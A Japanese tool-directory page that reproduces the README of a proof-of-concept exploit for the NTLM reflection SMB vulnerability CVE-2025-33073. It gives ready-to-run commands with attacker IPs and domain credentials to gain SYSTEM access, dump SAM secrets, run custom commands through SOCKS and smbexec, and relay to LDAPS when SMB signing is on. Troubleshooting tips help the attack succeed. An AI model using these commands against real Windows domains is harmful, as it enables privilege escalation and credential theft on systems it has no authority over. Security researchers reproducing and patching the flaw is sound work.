Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-33073 — NTLMリフレクションSMB脆弱性のPoCエクスプロイト | Kitploit
ツール/GitHubGitHub/mverschu/cve-2025-33073
特権昇格脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテスト認証
GitHubmverschu/cve-2025-33073

CVE-2025-33073

NTLMリフレクションSMB脆弱性のPoCエクスプロイト

リポジトリを見る
7141366ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-33073

NTLM リフレクション SMB 脆弱性の PoC エクスプロイト。

画像

すべてのクレジットは公式研究に帰属します:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

前提条件

OS: Kali Linux (ほとんどのパッケージがプリインストールされています)。

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (リポジトリに含まれています)

セットアップ

このツールは自動的に仮想環境を使用します。セットアップするには、次を実行します:

root@kitploit:~
./setup.sh

これにより仮想環境が作成され、ldap3-bleeding-edge==2.10.1.1337 を含むすべての必要な依存関係がインストールされます。

使用例

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
画像

カスタムコマンド
secretsdump を実行する代わりに、カスタムコマンドを実行できます。

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

画像

SOCKS
SYSTEM として有効な接続が確立された後、よりステルスにコマンドを実行するため。ここでは --target と --target-ip を同じにする必要があります。

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks

画像 SAM をダンプする代わりに、proxychains 経由でカスタムコマンドを実行することもできます。

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

画像

SMB 署名が有効な場合でも LDAPS へのリレーを悪用

SMB 署名が有効な場合にリフレクションが本当に機能しないかどうかを調査した結果、パケットから SIGN/SEAL が削除された場合に、通常は MIC のために不可能な SMB から LDAPS へのリレーが可能になるバグが見つかりました。

謝辞:

  • https://github.com/decoder-it/impacket-partial-mic/
  • https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/
  • https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/
root@kitploit:~
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
画像

DNS 要件なしの手動エクスプロイト

デバイスと同じブロードキャストドメインにあり、LLMNR ポイズニングに対して脆弱な場合、DNS レコードを登録せずにデバイスを悪用できます。

画像

トラブルシューティング

  • 攻撃にホスト名が使用され、Kali からの DNS ルックアップが発生するため、攻撃が機能しない場合があります。Kali が DNS サーバーを使用していないか、impacket-ntlmrelayx から '/ FAILED' メッセージが表示される場合は、ホストを /etc/hosts ファイルに追加してみてください。これにより攻撃が機能するはずです。
  • IP を使用する場合、攻撃は機能するはずです。複数回実行すると、失敗ではなく SUCCESS になることがあります。なぜこれが起こるのか、今のところ完全には明らかではありません。ネットワークに関係していると思います。
  • -M または --method を使用して別の強制方法を試してください。

Wireshark

ローカル NTLM 認証が行われる 画像

ローカル NTLM 認証が行われず、FAILED 試行になる 画像

知っておくと良いこと

  • DNS レコードはクライアントにも認識されている必要があります。状況によってはこれに時間がかかる場合があります。時間がかかるとは、数分程度待つことを意味します。
  • これは単なる PoC であり、AV/EDR バイパスは試みられていません。自己責任で使用してください。

修正方法

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

ツールをダウンロード